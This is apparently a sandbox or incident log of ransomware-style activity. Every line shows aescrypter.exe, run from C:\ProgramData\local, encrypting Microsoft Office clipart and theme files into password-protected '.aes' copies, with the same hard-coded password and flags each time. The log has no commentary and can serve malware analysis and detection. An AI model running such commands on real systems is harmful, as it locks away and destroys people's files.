"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
